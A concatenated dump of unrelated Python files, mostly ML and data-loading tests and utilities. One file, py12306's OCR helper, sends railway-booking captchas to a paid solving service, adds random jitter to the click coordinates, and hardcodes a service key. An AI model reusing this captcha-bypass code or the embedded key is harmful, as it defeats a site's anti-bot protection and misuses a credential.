client._checksum(mocked_blob, local_file_path)
mock_remove.assert_called_once()
def test_is_file():
object_key = base_key + file_name
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_bucket.get_blob = MagicMock(return_value=mocked_blob)
mocked_blob.name = object_key
actual_result = client._is_file(mocked_bucket, object_key)
mocked_bucket.get_blob.assert_called_with(object_key)
expected_result = True
assert actual_result == expected_result
def test_MD5_hex():
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
actual_result = client._md5_hex(md5_hash)
expected_result = "69b7"
assert actual_result == expected_result
def test_upload_file():
localfile = local_path + file_name
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_gcs_client.get_bucket = MagicMock(return_value=mocked_bucket)
mocked_bucket.blob = MagicMock(return_value=mocked_blob)
mocked_blob.upload_from_filename = MagicMock()
client._upload_file(
local_path=localfile, bucket=mocked_bucket, key=base_key
)
mocked_blob.upload_from_filename.assert_called_with(localfile)
@patch("datasetinsights.io.gcs.Path.glob")
def test_upload_folder(mock_glob):
localfile = local_path + file_name
mocked_gcs_client = MagicMock()
mock_glob.return_value = [Path(localfile)]
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
client._upload_file = MagicMock()
mocked_bucket = MagicMock()
mocked_blob = MagicMock()
mocked_gcs_client.get_bucket = MagicMock(return_value=mocked_bucket)
mocked_bucket.blob = MagicMock(return_value=mocked_blob)
mocked_blob.upload_from_filename = MagicMock()
client._upload_folder(
local_path=local_path, bucket=mocked_bucket, key=base_key
)
client._upload_file.assert_called_with(
bucket=mocked_bucket,
key=base_key + file_name,
local_path=localfile,
)
def test_gcs_downloader():
url = "gs://fake_bucket/path/to"
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.downloader.gcs_downloader.GCSClient",
MagicMock(return_value=mocked_gcs_client),
):
downloader = GCSDatasetDownloader()
downloader.download(url, local_path)
mocked_gcs_client.download.assert_called_with(
local_path=local_path, url=url
)
def test_gcs_parse():
mocked_gcs_client = MagicMock()
with patch(
"datasetinsights.io.gcs.Client",
MagicMock(return_value=mocked_gcs_client),
):
client = GCSClient()
th_bucket = "some_bucket_name"
th_path = "some/cloud/path"
url = "gs://some_bucket_name/some/cloud/path"
bucket, path = client._parse(url)
assert (bucket, path) == (th_bucket, th_path)
bad_url = "s3://path/to/bad/url"
with pytest.raises(ValueError, match=r"Specified destination prefix:"):
client._parse(bad_url)
```
#### File: tests/unity_perception/test_captures.py
```python
import collections
import json
import pytest
from datasetinsights.datasets.unity_perception import Captures
from datasetinsights.datasets.unity_perception.exceptions import (
DefinitionIDError,
)
from datasetinsights.datasets.unity_perception.tables import (
SCHEMA_VERSION,
glob,
)
@pytest.mark.parametrize(
"data_dir_name", ["simrun", "no_annotations_or_metrics"],
)
def test_get_captures_and_annotations(mock_data_base_dir, data_dir_name):
mock_data_dir = mock_data_base_dir / data_dir_name
captures = Captures(str(mock_data_dir), version=SCHEMA_VERSION)
captures_per_definition = collections.defaultdict(int)
json_files = glob(mock_data_dir, captures.FILE_PATTERN)
for json_file in json_files:
records = json.load(open(json_file, "r"))[Captures.TABLE_NAME]
for record in records:
for annotation in record["annotations"]:
def_id = annotation["annotation_definition"]
captures_per_definition[def_id] += 1
for def_id, count in captures_per_definition.items():
assert len(captures.filter(def_id)) == count
with pytest.raises(DefinitionIDError):
captures.filter("bad_definition_id")
```
#### File: tests/unity_perception/test_download.py
```python
import pathlib
import tempfile
from unittest.mock import patch
import numpy as np
import pandas as pd
import pytest
import responses
from datasetinsights.io.download import (
compute_checksum,
download_file,
get_checksum_from_file,
validate_checksum,
)
from datasetinsights.io.downloader.unity_simulation import (
Downloader,
FileType,
_filter_unsuccessful_attempts,
)
from datasetinsights.io.exceptions import ChecksumError, DownloadError
@pytest.fixture
def downloader():
parent_dir = pathlib.Path(__file__).parent.parent.absolute()
manifest_file = str(parent_dir / "mock_data" / "simrun_manifest.csv")
with tempfile.TemporaryDirectory() as tmp_dir:
dl = Downloader(manifest_file, tmp_dir)
yield dl
@responses.activate
def test_download_file_from_url_with_filename():
source_uri = "https://mock.uri"
body = b"some test string here"
responses.add(
responses.GET, source_uri, body=body, content_type="text/plain"
)
with tempfile.TemporaryDirectory() as tmp_dir:
dest_path = pathlib.Path(tmp_dir)
expected_file_path = dest_path / "file.txt"
file_path = download_file(source_uri, tmp_dir, file_name="file.txt")
assert file_path == expected_file_path
assert file_path.is_file()
with open(file_path, "rb") as f:
assert f.read() == body
@responses.activate
def test_download_file_from_url_without_filename():
source_uri = "https://mock.uri"
body = b"some test string here"
responses.add(
responses.GET,
url=source_uri,
body=body,
content_type="text/plain",
headers={"content-disposition": "attachment; filename=file.txt"},
)
with tempfile.TemporaryDirectory() as tmp_dir:
dest_path = pathlib.Path(tmp_dir)
expected_file_path = dest_path / "file.txt"
file_path = download_file(source_uri, dest_path)
assert file_path == expected_file_path
assert file_path.is_file()
with open(file_path, "rb") as f:
assert f.read() == body
def test_download_bad_request():
source_uri = "https://mock.uri"
dest_path = "file/path/does/not/matter"
responses.add(responses.GET, source_uri, status=403)
with pytest.raises(DownloadError):
download_file(source_uri, dest_path, False)
def test_download_rows(downloader):
n_rows = len(downloader.manifest)
with patch(
"datasetinsights.io.downloader.unity_simulation.download_file"
) as mocked_dl:
matched_rows = pd.Series(np.zeros(n_rows).astype(bool))
downloaded = downloader._download_rows(matched_rows)
assert len(downloaded) == 0
mocked_dl.assert_not_called()
with patch(
"datasetinsights.io.downloader.unity_simulation.download_file"
) as mocked_dl:
matched_rows = pd.Series(np.ones(n_rows).astype(bool))
downloaded = downloader._download_rows(matched_rows)
assert len(downloaded) == n_rows
assert mocked_dl.call_count == n_rows
def test_download_all(downloader):
n_rows = len(downloader.manifest)
with patch(
"datasetinsights.io.downloader.unity_simulation.download_file"
) as mocked_dl:
downloader.download_references()
downloader.download_captures()
downloader.download_metrics()
downloader.download_binary_files()
assert mocked_dl.call_count == n_rows
def test_filter_unsuccessful_attempts_multiple_ids():
manifest_df = pd.DataFrame(
{
"run_execution_id": ["a"] * 8,
"attempt_id": [0, 1, 0, 0, 0, 1, 2, 3],
"app_param_id": [47, 47, 22, 22, 50, 50, 50, 50],
"instance_id": [0, 0, 1, 1, 2, 2, 2, 2],
}
)
expected_result = pd.DataFrame(
{
"run_execution_id": ["a"] * 4,
"attempt_id": [1, 0, 0, 3],
"app_param_id": [47, 22, 22, 50],
"instance_id": [0, 1, 1, 2],
}
)
actual_result = _filter_unsuccessful_attempts(manifest_df)
pd.testing.assert_frame_equal(expected_result, actual_result)
def test_filter_unsuccessful_attempts_single_attempt_id():
manifest_df = pd.DataFrame(
{
"run_execution_id": ["a", "a"],
"attempt_id": [0, 0],
"app_param_id": [47, 52],
"instance_id": [0, 0],
}
)
expected_result = pd.DataFrame(
{
"run_execution_id": ["a", "a"],
"attempt_id": [0, 0],
"app_param_id": [47, 52],
"instance_id": [0, 0],
}
)
actual_result = _filter_unsuccessful_attempts(manifest_df)
pd.testing.assert_frame_equal(expected_result, actual_result)
def test_match_filetypes():
manifest = pd.DataFrame(
{
"file_name": [
"abc/dfv.png",
"Dataset/annotation_definitions.json",
"Dataset/metrics_04323423.json",
"Dataset/metric_definitions.json",
"Dataset/sensors.json",
"Dataset/captures_000123153.json",
"Dataset/egos.json",
"segmentation/image_9013.png",
"lidar/points_9013.pcd",
]
}
)
expected_filetypes = [
FileType.BINARY,
FileType.REFERENCE,
FileType.METRIC,
FileType.REFERENCE,
FileType.REFERENCE,
FileType.CAPTURE,
FileType.REFERENCE,
FileType.BINARY,
FileType.BINARY,
]
assert Downloader.match_filetypes(manifest) == expected_filetypes
def test_compute_checksum():
expected_checksum = "123456"
with patch("datasetinsights.io.download._crc32_checksum") as mocked:
mocked.return_value = expected_checksum
computed = compute_checksum("filepath/not/important", "CRC32")
assert computed == expected_checksum
expected_checksum_md5 = "123456"
with patch("datasetinsights.io.download._md5_checksum") as mocked:
mocked.return_value = expected_checksum_md5
computed = compute_checksum("filepath/not/important", "MD5")
assert computed == expected_checksum
with pytest.raises(ValueError):
compute_checksum("filepath/not/important", "UNSUPPORTED_ALGORITHM")
def test_validate_checksum():
expected_checksum = "123456"
wrong_checksum = "123455"
with patch("datasetinsights.io.download.compute_checksum") as mocked:
mocked.return_value = wrong_checksum
with pytest.raises(ChecksumError):
validate_checksum("filepath/not/important", int(expected_checksum))
def test_get_checksum_from_local_file_path():
# arrange
with tempfile.NamedTemporaryFile(mode="w+t", suffix=".txt") as tmp:
tmp.write("123456")
tmp.flush()
# act
checksum = get_checksum_from_file(tmp.name)
# assert
assert checksum == "123456"
@pytest.mark.parametrize("filepath", ["http://some/path", "https://some/path"])
@patch("datasetinsights.io.download.download_file")
def test_get_checksum_from_http_source(mock_download_file, filepath):
# arrange
with tempfile.NamedTemporaryFile(mode="w+t", suffix=".txt") as tmp:
tmp.write("123456")
tmp.flush()
mock_download_file.return_value = tmp.name
# act
checksum = get_checksum_from_file(filepath)
# assert
mock_download_file.assert_called_once()
assert checksum == "123456"
@pytest.mark.parametrize(
"filepath", ["some/wrong/path", "zvsssdfsdg", "wrong/ path/file"]
)
@patch("datasetinsights.io.download.download_file")
def test_get_checksum_from_non_existing_file_or_wrong_path(
mock_download_file, filepath
):
# assert
with pytest.raises(ValueError):
# act
get_checksum_from_file(filepath)
# assert
mock_download_file.assert_not_called()
``` |
{
"source": "87003697/FewX-mmdet",
"score": 2
} |
#### File: mmdet/apis/test.py
```python
import os.path as osp
import pickle
import shutil
import tempfile
import time
import mmcv
import torch
import torch.distributed as dist
from mmcv.image import tensor2imgs
from mmcv.runner import get_dist_info
from mmdet.core import encode_mask_results
import pandas as pd
import numpy as np
import os
import tqdm
from mmdet.datasets.pipelines import to_tensor
def single_gpu_test(model,
data_loader,
show=False,
out_dir=None,
show_score_thr=0.3):
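    """Test a model with a single gpu, optionally showing or saving result visualizations."""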
model.eval()
results = []
dataset = data_loader.dataset
if 'FsodRCNN' in str(type(model.module)):
model = get_support(model, data_loader)
prog_bar = mmcv.ProgressBar(len(dataset))
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
batch_size = len(result)
if show or out_dir:
if batch_size == 1 and isinstance(data['img'][0], torch.Tensor):
img_tensor = data['img'][0]
else:
img_tensor = data['img'][0].data[0]
img_metas = data['img_metas'][0].data[0]
imgs = tensor2imgs(img_tensor, **img_metas[0]['img_norm_cfg'])
assert len(imgs) == len(img_metas)
for i, (img, img_meta) in enumerate(zip(imgs, img_metas)):
h, w, _ = img_meta['img_shape']
img_show = img[:h, :w, :]
ori_h, ori_w = img_meta['ori_shape'][:-1]
img_show = mmcv.imresize(img_show, (ori_w, ori_h))
if out_dir:
out_file = osp.join(out_dir, img_meta['ori_filename'])
else:
out_file = None
model.module.show_result(
img_show,
result[i],
show=show,
out_file=out_file,
score_thr=show_score_thr)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
for _ in range(batch_size):
prog_bar.update()
return results
def multi_gpu_test(model, data_loader, tmpdir=None, gpu_collect=False):
"""Test model with multiple gpus.
This method tests model with multiple gpus and collects the results
under two different modes: gpu and cpu modes. By setting 'gpu_collect=True'
it encodes results to gpu tensors and use gpu communication for results
collection. On cpu mode it saves the results on different gpus to 'tmpdir'
and collects them by the rank 0 worker.
Args:
model (nn.Module): Model to be tested.
data_loader (nn.Dataloader): Pytorch data loader.
tmpdir (str): Path of directory to save the temporary results from
different gpus under cpu mode.
gpu_collect (bool): Option to use either gpu or cpu to collect results.
Returns:
list: The prediction results.
"""
model.eval()
results = []
dataset = data_loader.dataset
if 'FsodRCNN' in str(type(model.module)):
model = get_support(model, data_loader)
rank, world_size = get_dist_info()
if rank == 0:
prog_bar = mmcv.ProgressBar(len(dataset))
time.sleep(2) # This line can prevent deadlock problem in some cases.
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
if rank == 0:
batch_size = len(result)
for _ in range(batch_size * world_size):
prog_bar.update()
# collect results from all ranks
if gpu_collect:
results = collect_results_gpu(results, len(dataset))
else:
results = collect_results_cpu(results, len(dataset), tmpdir)
return results
def collect_results_cpu(result_part, size, tmpdir=None):
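    """Collect results under cpu mode: each rank dumps its partial results to
    'tmpdir' and rank 0 loads, reorders and merges them."""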
rank, world_size = get_dist_info()
# create a tmp dir if it is not specified
if tmpdir is None:
MAX_LEN = 512
# 32 is whitespace
dir_tensor = torch.full((MAX_LEN, ),
32,
dtype=torch.uint8,
device='cuda')
if rank == 0:
mmcv.mkdir_or_exist('.dist_test')
tmpdir = tempfile.mkdtemp(dir='.dist_test')
tmpdir = torch.tensor(
bytearray(tmpdir.encode()), dtype=torch.uint8, device='cuda')
dir_tensor[:len(tmpdir)] = tmpdir
dist.broadcast(dir_tensor, 0)
tmpdir = dir_tensor.cpu().numpy().tobytes().decode().rstrip()
else:
mmcv.mkdir_or_exist(tmpdir)
# dump the part result to the dir
mmcv.dump(result_part, osp.join(tmpdir, f'part_{rank}.pkl'))
dist.barrier()
# collect all parts
if rank != 0:
return None
else:
# load results of all parts from tmp dir
part_list = []
for i in range(world_size):
part_file = osp.join(tmpdir, f'part_{i}.pkl')
part_list.append(mmcv.load(part_file))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
# remove tmp dir
shutil.rmtree(tmpdir)
return ordered_results
def collect_results_gpu(result_part, size):
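    """Collect results under gpu mode by all-gathering pickled, padded result
    tensors and merging them on rank 0."""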
rank, world_size = get_dist_info()
# dump result part to tensor with pickle
part_tensor = torch.tensor(
bytearray(pickle.dumps(result_part)), dtype=torch.uint8, device='cuda')
# gather all result part tensor shape
shape_tensor = torch.tensor(part_tensor.shape, device='cuda')
shape_list = [shape_tensor.clone() for _ in range(world_size)]
dist.all_gather(shape_list, shape_tensor)
# padding result part tensor to max length
shape_max = torch.tensor(shape_list).max()
part_send = torch.zeros(shape_max, dtype=torch.uint8, device='cuda')
part_send[:shape_tensor[0]] = part_tensor
part_recv_list = [
part_tensor.new_zeros(shape_max) for _ in range(world_size)
]
# gather all result part
dist.all_gather(part_recv_list, part_send)
if rank == 0:
part_list = []
for recv, shape in zip(part_recv_list, shape_list):
part_list.append(
pickle.loads(recv[:shape[0]].cpu().numpy().tobytes()))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
return ordered_results
def get_support(model_, data_loader,
file_client_args=dict(backend='disk'),color_type='color',
mean=[103.530, 116.280, 123.675], std=[1.0, 1.0, 1.0], to_rgb=False):
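    """Pre-compute class-wise support features for a FsodRCNN detector.
    Reads the 10-shot support set listed in 10_shot_support_df.pkl, extracts
    RoI features for every support box, averages them per class at the res4 and
    res5 levels, and attaches the result to the detector as 'support_dict'.
    """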
model = model_.module
dataset = data_loader.dataset
cat2label = dataset.cat2label
reverse_id_mapper = lambda dataset_id: cat2label[dataset_id]
support_path = './data/coco/10_shot_support_df.pkl'
support_df = pd.read_pickle(support_path)
support_df['category_id'] = support_df['category_id'].map(reverse_id_mapper)
file_client = mmcv.FileClient(**file_client_args) # img loader
mean = np.array(mean, dtype=np.float32)
std = np.array(std, dtype=np.float32)
to_rgb = to_rgb
support_dict = {'res4_avg': {}, 'res5_avg': {}}
# print('-'*10,'Extracting Support Features','-'*20)
for cls in support_df['category_id'].unique():
support_cls_df = support_df.loc[support_df['category_id'] == cls, :].reset_index()
support_data_all = []
support_box_all = []
for index, support_img_df in support_cls_df.iterrows():
# Collect image as tensor
img_path = os.path.join('./data/coco', support_img_df['file_path'][2:])
img_bytes = file_client.get(img_path)
img = mmcv.imfrombytes(img_bytes, flag=color_type)
# Follow the pipeline of Normalize
img = mmcv.imnormalize(img, mean, std, to_rgb)
# Follow the pipeline of ImageToTensor
if len(img.shape) < 3:
img = np.expand_dims(img, -1)
img = to_tensor(np.ascontiguousarray(img.transpose(2, 0, 1))).cuda()
support_data_all.append(img)
# Collect bbox as tensor
bbox = support_img_df['support_box']
bbox = to_tensor(np.stack(bbox, axis = 0))
support_box_all.append(bbox)
support_features = model.extract_feat(torch.stack(support_data_all))
support_bbox_features = []
for support_features_ in support_features:
for support_feature, support_bbox in zip(support_features_,support_box_all):
# extract roi features in res4
support_bbox = torch.cat([torch.zeros_like(support_bbox[:1]), support_bbox]).float().contiguous().cuda()
support_bbox_features.append(model.roi_head.bbox_roi_extractor([support_feature.unsqueeze(0)],support_bbox.unsqueeze(0)))
# collect roi features up
support_bbox_features = torch.cat(support_bbox_features)
res4_avg = support_bbox_features.mean(0, True).mean(dim=[2,3], keepdim=True)
support_dict['res4_avg'][cls] = res4_avg.detach()
        # use res5 to collect deeper features
assert model.with_shared_head
res5_feature = model.roi_head.shared_head(support_bbox_features)
res5_avg = res5_feature.mean(0, True)
support_dict['res5_avg'][cls] = res5_avg.detach()
model.support_dict = support_dict
return model_
``` |
{
"source": "871392010/relaxrender",
"score": 3
} |
#### File: features/blur/blur_naive.py
```python
import numpy
# 3x3 Gaussian kernel, normalized (the middle row had a typo in the original).
gauss_kernel = numpy.array([[1, 2, 1],
                            [2, 4, 2],
                            [1, 2, 1]]) * 1.0 / 16
def blur_naive_version(image, districts, scale):
    # Blur every rectangular district of an H x W x C image.
    if len(image.shape) != 3:
        raise ValueError("blur_naive_version expects an H x W x C color image")
    new_image = image.copy()
    for district in districts:
        new_image = gauss_blur_naive_version(new_image, district, scale)
    return new_image
def gauss_blur_naive_version(image, district, scale):
    # Reconstructed sketch: the original definition was truncated after "def".
    # A district is assumed to be (x0, y0, x1, y1); scale = number of 3x3 passes.
    x0, y0, x1, y1 = district
    region = image[y0:y1, x0:x1].astype(numpy.float64)
    for _ in range(int(scale)):
        padded = numpy.pad(region, ((1, 1), (1, 1), (0, 0)), mode='edge')
        region = sum(gauss_kernel[dy, dx] *
                     padded[dy:dy + region.shape[0], dx:dx + region.shape[1]]
                     for dy in range(3) for dx in range(3))
    image[y0:y1, x0:x1] = region.astype(image.dtype)
    return image
``` |
{
"source": "872409/py12306",
"score": 2
} |
#### File: py12306/helpers/OCR.py
```python
import math
import random
from py12306.config import Config
from py12306.log.common_log import CommonLog
from py12306.vender.ruokuai.main import RKClient
class OCR:
"""
    Image recognition
"""
@classmethod
def get_img_position(cls, img):
"""
获取图像坐标
:param img_path:
:return:
"""
self = cls()
return self.get_img_position_by_ruokuai(img)
def get_img_position_by_ruokuai(self, img):
ruokuai_account = Config().AUTO_CODE_ACCOUNT
soft_id = '119671'
soft_key = '6839cbaca1f942f58d2760baba5ed987'
rc = RKClient(ruokuai_account.get('user'), ruokuai_account.get('pwd'), soft_id, soft_key)
result = rc.rk_create(img, 6113)
if "Result" in result:
return self.get_image_position_by_offset(list(result['Result']))
CommonLog.print_auto_code_fail(result.get("Error", '-'))
return None
def get_image_position_by_offset(self, offsets):
positions = []
width = 75
height = 75
for offset in offsets:
random_x = random.randint(-5, 5)
random_y = random.randint(-5, 5)
offset = int(offset)
x = width * ((offset - 1) % 4 + 1) - width / 2 + random_x
y = height * math.ceil(offset / 4) - height / 2 + random_y
positions.append(int(x))
positions.append(int(y))
return positions
if __name__ == '__main__':
pass
# code_result = AuthCode.get_auth_code()
``` |
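The grid arithmetic in `get_image_position_by_offset` assumes the captcha sub-images sit in a 4-column grid of 75x75 pixel cells and that offsets are 1-based. The standalone sketch below recomputes the cell centres without the random jitter so the mapping is easy to verify; it is an illustration, not part of py12306.
```python
import math
def cell_center(offset, width=75, height=75, columns=4):
    """Return the (x, y) centre of the 1-based grid cell named by `offset`."""
    x = width * ((offset - 1) % columns + 1) - width / 2
    y = height * math.ceil(offset / columns) - height / 2
    return int(x), int(y)
print(cell_center(1))  # (37, 37): column 1, row 1
print(cell_center(6))  # (112, 112): column 2, row 2
```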
{
"source": "873040/Abhishek",
"score": 2
} |
#### File: modeling/networks/masked_lm_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow.python.keras import keras_parameterized # pylint: disable=g-direct-tensorflow-import
from official.nlp.modeling.networks import masked_lm
from official.nlp.modeling.networks import transformer_encoder
# This decorator runs the test in V1, V2-Eager, and V2-Functional mode. It
# guarantees forward compatibility of this code for the V2 switchover.
@keras_parameterized.run_all_keras_modes
class MaskedLMTest(keras_parameterized.TestCase):
def create_network(self,
vocab_size,
sequence_length,
hidden_size,
num_predictions,
output='predictions',
xformer_stack=None):
# First, create a transformer stack that we can use to get the LM's
# vocabulary weight.
if xformer_stack is None:
xformer_stack = transformer_encoder.TransformerEncoder(
vocab_size=vocab_size,
num_layers=1,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_attention_heads=4,
)
word_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
mask = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
type_ids = tf.keras.Input(shape=(sequence_length,), dtype=tf.int32)
lm_outputs, _ = xformer_stack([word_ids, mask, type_ids])
# Create a maskedLM from the transformer stack.
test_network = masked_lm.MaskedLM(
num_predictions=num_predictions,
input_width=lm_outputs.shape[-1],
source_network=xformer_stack,
output=output)
return test_network
def test_network_creation(self):
vocab_size = 100
sequence_length = 32
hidden_size = 64
num_predictions = 21
test_network = self.create_network(
vocab_size=vocab_size,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_predictions=num_predictions)
# Make sure that the output tensor of the masked LM is the right shape.
lm_input_tensor = tf.keras.Input(shape=(sequence_length, hidden_size))
masked_lm_positions = tf.keras.Input(
shape=(num_predictions,), dtype=tf.int32)
output = test_network([lm_input_tensor, masked_lm_positions])
expected_output_shape = [None, num_predictions, vocab_size]
self.assertEqual(expected_output_shape, output.shape.as_list())
def test_network_invocation_with_internal_logits(self):
vocab_size = 100
sequence_length = 32
hidden_size = 64
num_predictions = 21
test_network = self.create_network(
vocab_size=vocab_size,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_predictions=num_predictions)
# Create a model from the masked LM layer.
lm_input_tensor = tf.keras.Input(shape=(sequence_length, hidden_size))
masked_lm_positions = tf.keras.Input(
shape=(num_predictions,), dtype=tf.int32)
output = test_network([lm_input_tensor, masked_lm_positions])
model = tf.keras.Model([lm_input_tensor, masked_lm_positions], output)
logits_model = tf.keras.Model(test_network.inputs, test_network.logits)
# Invoke the masked LM on some fake data to make sure there are no runtime
# errors in the code.
batch_size = 3
lm_input_data = 10 * np.random.random_sample(
(batch_size, sequence_length, hidden_size))
masked_position_data = np.random.randint(
2, size=(batch_size, num_predictions))
outputs = model.predict([lm_input_data, masked_position_data])
logits = logits_model.predict([lm_input_data, masked_position_data])
# Ensure that the tensor shapes are correct.
expected_output_shape = (batch_size, num_predictions, vocab_size)
self.assertEqual(expected_output_shape, outputs.shape)
self.assertEqual(expected_output_shape, logits.shape)
# Ensure that the logits, when softmaxed, create the outputs.
input_tensor = tf.keras.Input(expected_output_shape[1:])
output_tensor = tf.keras.layers.Activation(tf.nn.log_softmax)(input_tensor)
softmax_model = tf.keras.Model(input_tensor, output_tensor)
calculated_softmax = softmax_model.predict(logits)
self.assertAllClose(outputs, calculated_softmax)
def test_network_invocation_with_external_logits(self):
vocab_size = 100
sequence_length = 32
hidden_size = 64
num_predictions = 21
xformer_stack = transformer_encoder.TransformerEncoder(
vocab_size=vocab_size,
num_layers=1,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_attention_heads=4,
)
test_network = self.create_network(
vocab_size=vocab_size,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_predictions=num_predictions,
xformer_stack=xformer_stack,
output='predictions')
logit_network = self.create_network(
vocab_size=vocab_size,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_predictions=num_predictions,
xformer_stack=xformer_stack,
output='logits')
logit_network.set_weights(test_network.get_weights())
# Create a model from the masked LM layer.
lm_input_tensor = tf.keras.Input(shape=(sequence_length, hidden_size))
masked_lm_positions = tf.keras.Input(
shape=(num_predictions,), dtype=tf.int32)
output = test_network([lm_input_tensor, masked_lm_positions])
logit_output = logit_network([lm_input_tensor, masked_lm_positions])
model = tf.keras.Model([lm_input_tensor, masked_lm_positions], output)
logits_model = tf.keras.Model(([lm_input_tensor, masked_lm_positions]),
logit_output)
# Invoke the masked LM on some fake data to make sure there are no runtime
# errors in the code.
batch_size = 3
lm_input_data = 10 * np.random.random_sample(
(batch_size, sequence_length, hidden_size))
masked_position_data = np.random.randint(
2, size=(batch_size, num_predictions))
outputs = model.predict([lm_input_data, masked_position_data])
logits = logits_model.predict([lm_input_data, masked_position_data])
# Ensure that the tensor shapes are correct.
expected_output_shape = (batch_size, num_predictions, vocab_size)
self.assertEqual(expected_output_shape, outputs.shape)
self.assertEqual(expected_output_shape, logits.shape)
# Ensure that the logits, when softmaxed, create the outputs.
input_tensor = tf.keras.Input(expected_output_shape[1:])
output_tensor = tf.keras.layers.Activation(tf.nn.log_softmax)(input_tensor)
softmax_model = tf.keras.Model(input_tensor, output_tensor)
calculated_softmax = softmax_model.predict(logits)
self.assertAllClose(outputs, calculated_softmax)
def test_network_invocation(self):
vocab_size = 100
sequence_length = 32
hidden_size = 64
num_predictions = 21
test_network = self.create_network(
vocab_size=vocab_size,
sequence_length=sequence_length,
hidden_size=hidden_size,
num_predictions=num_predictions)
# Create a model from the masked LM layer.
lm_input_tensor = tf.keras.Input(shape=(sequence_length, hidden_size))
masked_lm_positions = tf.keras.Input(
shape=(num_predictions,), dtype=tf.int32)
output = test_network([lm_input_tensor, masked_lm_positions])
model = tf.keras.Model([lm_input_tensor, masked_lm_positions], output)
# Invoke the masked LM on some fake data to make sure there are no runtime
# errors in the code.
batch_size = 3
lm_input_data = 10 * np.random.random_sample(
(batch_size, sequence_length, hidden_size))
masked_position_data = np.random.randint(
2, size=(batch_size, num_predictions))
_ = model.predict([lm_input_data, masked_position_data])
def test_unknown_output_type_fails(self):
with self.assertRaisesRegex(ValueError, 'Unknown `output` value "bad".*'):
_ = self.create_network(
vocab_size=8,
sequence_length=8,
hidden_size=8,
num_predictions=8,
output='bad')
if __name__ == '__main__':
tf.test.main()
```
#### File: utils/misc/callstack_sampler.py
```python
import contextlib
import datetime
import signal
import traceback
class CallstackSampler(object):
"""A simple signal-based Python callstack sampler.
"""
def __init__(self, interval=None):
self.stacks = []
self.interval = 0.001 if interval is None else interval
def _sample(self, signum, frame):
"""Samples the current stack."""
del signum
stack = traceback.extract_stack(frame)
formatted_stack = []
formatted_stack.append(datetime.datetime.utcnow())
for filename, lineno, function_name, text in stack:
formatted_frame = '{}:{}({})({})'.format(filename, lineno, function_name,
text)
formatted_stack.append(formatted_frame)
self.stacks.append(formatted_stack)
signal.setitimer(signal.ITIMER_VIRTUAL, self.interval, 0)
@contextlib.contextmanager
def profile(self):
signal.signal(signal.SIGVTALRM, self._sample)
signal.setitimer(signal.ITIMER_VIRTUAL, self.interval, 0)
try:
yield
finally:
signal.setitimer(signal.ITIMER_VIRTUAL, 0)
def save(self, fname):
with open(fname, 'w') as f:
for s in self.stacks:
for l in s:
f.write('%s\n' % l)
f.write('\n')
@contextlib.contextmanager
def callstack_sampling(filename, interval=None):
"""Periodically samples the Python callstack.
Args:
    filename: path of the file the sampled callstacks are written to.
interval: the sampling interval, in seconds. Defaults to 0.001.
Yields:
nothing
"""
sampler = CallstackSampler(interval=interval)
with sampler.profile():
yield
sampler.save(filename)
```
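A typical use of the `callstack_sampling` context manager above looks like the sketch below; the import path, the workload function, and the output file are placeholder assumptions. Note that `ITIMER_VIRTUAL` only counts CPU time, so no samples are taken while the process sleeps.
```python
# Hypothetical usage; `callstack_sampler` is assumed to be importable and
# `busy_work` stands in for real CPU-bound work.
from callstack_sampler import callstack_sampling
def busy_work(n=200000):
    return sum(i * i for i in range(n))
with callstack_sampling('/tmp/callstacks.txt', interval=0.005):
    busy_work()
# /tmp/callstacks.txt now holds one timestamped stack per sample,
# separated by blank lines, as written by CallstackSampler.save().
```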
#### File: research/adversarial_logit_pairing/eval.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl import app
from absl import flags
import tensorflow as tf
import adversarial_attack
import model_lib
from datasets import dataset_factory
FLAGS = flags.FLAGS
flags.DEFINE_string('train_dir', None,
'Training directory. If specified then this program '
'runs in continuous evaluation mode.')
flags.DEFINE_string('checkpoint_path', None,
'Path to the file with checkpoint. If specified then '
'this program evaluates only provided checkpoint one time.')
flags.DEFINE_string('output_file', None,
'Name of output file. Used only in single evaluation mode.')
flags.DEFINE_string('eval_name', 'default', 'Name for eval subdirectory.')
flags.DEFINE_string('master', '', 'Tensorflow master.')
flags.DEFINE_string('model_name', 'resnet_v2_50', 'Name of the model.')
flags.DEFINE_string('adv_method', 'clean',
'Method which is used to generate adversarial examples.')
flags.DEFINE_string('dataset', 'imagenet',
'Dataset: "tiny_imagenet" or "imagenet".')
flags.DEFINE_integer('dataset_image_size', 64,
'Size of the images in the dataset.')
flags.DEFINE_string('hparams', '', 'Hyper parameters.')
flags.DEFINE_string('split_name', 'validation', 'Name of the split.')
